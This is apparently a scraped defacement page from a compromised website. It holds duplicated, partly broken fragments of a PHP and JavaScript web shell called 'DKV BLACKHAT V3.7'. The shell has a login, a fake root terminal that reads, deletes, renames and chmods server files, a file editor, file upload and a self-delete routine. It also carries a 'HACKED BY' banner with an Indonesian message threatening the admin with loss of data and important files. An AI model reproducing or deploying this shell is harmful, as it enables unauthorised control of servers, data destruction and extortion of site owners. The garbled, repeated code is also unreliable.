
Gambar : Self Delete Success
"); } if(!isset($_SESSION['login'])) { ?>
DKV BLACKHAT LOGINDKV BLACKHAT V3.7
$error";?> $f,'type'=>is_dir($cwd.$f)?'folder':'file','size'=>is_dir($cwd.$f)?'-':@round(@filesize($cwd.$f)/1024,2).' KB','perm'=>@substr(sprintf('%o',@fileperms($cwd.$f)),-4)];} echo json_encode(['files'=>$files,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='cmd'){ $cmd=trim($_POST['cmd']); $parts=preg_split('/\s+/',$cmd,2); $c=$parts[0]; $a=$parts[1]??''; $out=''; if($c=='cd'){ $n=$a=='..'?realpath($cwd.'../'):realpath($cwd.$a); if($n&&strpos($n,$root)===0){$_SESSION['cwd']=$n.'/';$out="root@dkv:".str_replace($root,'/',$n);} else $out="bash: cd: $a: No such directory";} elseif($c=='rm'){ $f=$cwd.$a; $out=(is_dir($f)?@rmdir($f):@unlink($f))?"Removed: $a":"Permission denied";} elseif($c=='cat'){ $f=$cwd.$a; $out=file_exists($f)&&is_file($f)?htmlspecialchars(@file_get_contents($f)):"bash: cat: $a: No such file";} elseif($c=='rename'){ $p=explode(' ',$a,2); $out=@rename($cwd.$p[0],$cwd.$p[1])?"Renamed $p[0] -> $p[1]":"Rename failed";} elseif($c=='chmod'){ $p=explode(' ',$a,2); $out=@chmod($cwd.$p[1],octdec($p[0]))?"Chmod $p[1] -> $p[0]":"Chmod failed";} elseif($c=='pwd') $out=str_replace($root,'/',$cwd); elseif($c=='ls') { foreach(@scandir($cwd) as $f) if($f!='.') $out.=(is_dir($cwd.$f)?"[DIR] ":"[FILE] ").$f."\n"; if($out=='')$out='Folder kosong';} elseif($c=='clear') $out="CLEAR"; elseif($c=='help') $out="ls cd.. cat rm rename old new chmod 755 file pwd clear edit newfile newfolder help"; elseif($c=='edit') $_SESSION['edit']=$cwd.$a; else $out="bash: $c: command not found"; echo json_encode(['output'=>$out,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='save_file'){ @file_put_contents($_SESSION['edit'], $_POST['content']); echo json_encode(['status'=>'saved']); exit;} } if(isset($_FILES['file'])){ $t=$cwd.basename($_FILES['file']['name']); $msg=@move_uploaded_file($_FILES['file']['tmp_name'],$t)?"[OK] Upload Berhasil: ".basename($_FILES['file']['name']):"[!] Gagal Upload. chmod folder 755"; } if(isset($_POST['new_name'])){ $p=$cwd.$_POST['new_name']; $msg=$_POST['type']=='folder'? (@mkdir($p,0755)?"[OK] Folder Dibuat":"Gagal mkdir") : (@file_put_contents($p,'')?"[OK] File Dibuat":"Gagal create");} ?>
HACKED BY DKV BLACKHAT & Pasuruan Sec Team SELF DELETE LOGOUT
HACKED BY DKV BLACKHAT WEBSHELL
Dear Admin,
Tolong perbaiki system anda.
Jika tidak kami akan bertindak lebih jauh
hingga anda kehilangan data dan file penting.
$msg";?>
:: FILE MANAGER REALTIME ::
Path: /
Loading...
DKV Terminal v3.7 > Ketik 'help' untuk bantuan
root@dkv:/#
` })} function previewImg(f){ preview.innerHTML=`
[image unavailable]`; } loadFiles(); function print(t){ if(t=="CLEAR"){out.innerHTML='';return} out.innerHTML+=t+"\n"; out.scrollTop=out.scrollHeight;} async function run(c){ print(`root@dkv:${tpath.innerText}# ${c}`); let d=await api({action:'cmd',cmd:c}); print(d.output); tpath.innerText=d.path; loadFiles(); if(c.startsWith('edit ')){ editor.style.display='block'; saveBtn.style.display='inline-block'; editor.value=d.output; } } cmd.onkeydown=async e=>{ if(e.key=='Enter'){let c=cmd.value; cmd.value=''; await run(c);} } saveBtn.onclick=async ()=>{ await api({action:'save_file',content:editor.value}); alert('File Berhasil Disimpan!'); editor.style.display='none'; saveBtn.style.display='none';} const canvas=document.getElementById('matrix'); const ctx=canvas.getContext('2d'); let w=canvas.width=window.innerWidth; let h=canvas.height=window.innerHeight; window.onresize=()=>{w=canvas.width=window.innerWidth;h=canvas.height=window.innerHeight}; const chars="01DKVBLACKHAT"; const fontSize=14; let cols=Math.floor(w/fontSize); let drops=Array(cols).fill(1); setInterval(()=>{ ctx.fillStyle='rgba(0,0,0,0.05)'; ctx.fillRect(0,0,w,h); ctx.fillStyle='#0f0'; ctx.font=fontSize+'px monospace'; for(let i=0;i
h && Math.random() > 0.975) drops[i]=0; drops[i]++; } },35);
WEBSITE INI DIRETAS OLEH DKV BLACKHAT
Self Delete Success
"); } if(!isset($_SESSION['login'])) { ?>DKV BLACKHAT LOGIN
DKV BLACKHAT V3.7
$error
";?>
$f,'type'=>is_dir($cwd.$f)?'folder':'file','size'=>is_dir($cwd.$f)?'-':@round(@filesize($cwd.$f)/1024,2).' KB','perm'=>@substr(sprintf('%o',@fileperms($cwd.$f)),-4)];} echo json_encode(['files'=>$files,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='cmd'){ $cmd=trim($_POST['cmd']); $parts=preg_split('/\s+/',$cmd,2); $c=$parts[0]; $a=$parts[1]??''; $out=''; if($c=='cd'){ $n=$a=='..'?realpath($cwd.'../'):realpath($cwd.$a); if($n&&strpos($n,$root)===0){$_SESSION['cwd']=$n.'/';$out="root@dkv:".str_replace($root,'/',$n);} else $out="bash: cd: $a: No such directory";} elseif($c=='rm'){ $f=$cwd.$a; $out=(is_dir($f)?@rmdir($f):@unlink($f))?"Removed: $a":"Permission denied";} elseif($c=='cat'){ $f=$cwd.$a; $out=file_exists($f)&&is_file($f)?htmlspecialchars(@file_get_contents($f)):"bash: cat: $a: No such file";} elseif($c=='rename'){ $p=explode(' ',$a,2); $out=@rename($cwd.$p[0],$cwd.$p[1])?"Renamed $p[0] -> $p[1]":"Rename failed";} elseif($c=='chmod'){ $p=explode(' ',$a,2); $out=@chmod($cwd.$p[1],octdec($p[0]))?"Chmod $p[1] -> $p[0]":"Chmod failed";} elseif($c=='pwd') $out=str_replace($root,'/',$cwd); elseif($c=='ls') { foreach(@scandir($cwd) as $f) if($f!='.') $out.=(is_dir($cwd.$f)?"[DIR] ":"[FILE] ").$f."\n"; if($out=='')$out='Folder kosong';} elseif($c=='clear') $out="CLEAR"; elseif($c=='help') $out="ls cd.. cat rm rename old new chmod 755 file pwd clear edit newfile newfolder help"; elseif($c=='edit') $_SESSION['edit']=$cwd.$a; else $out="bash: $c: command not found"; echo json_encode(['output'=>$out,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='save_file'){ @file_put_contents($_SESSION['edit'], $_POST['content']); echo json_encode(['status'=>'saved']); exit;} } if(isset($_FILES['file'])){ $t=$cwd.basename($_FILES['file']['name']); $msg=@move_uploaded_file($_FILES['file']['tmp_name'],$t)?"[OK] Upload Berhasil: ".basename($_FILES['file']['name']):"[!] Gagal Upload. chmod folder 755"; } if(isset($_POST['new_name'])){ $p=$cwd.$_POST['new_name']; $msg=$_POST['type']=='folder'? (@mkdir($p,0755)?"[OK] Folder Dibuat":"Gagal mkdir") : (@file_put_contents($p,'')?"[OK] File Dibuat":"Gagal create");} ?>HACKED BY DKV BLACKHAT & Pasuruan Sec TeamCLICK FOR SOUNDSELF DELETE LOGOUT
Logo DKV
HACKED BY DKV BLACKHAT WEBSHELL
Dear Admin,
Tolong perbaiki system anda.
Jika tidak kami akan bertindak lebih jauh
hingga anda kehilangan data dan file penting.
$msg
";?>
:: FILE MANAGER REALTIME ::
Path: /
Loading...
Video Terkait: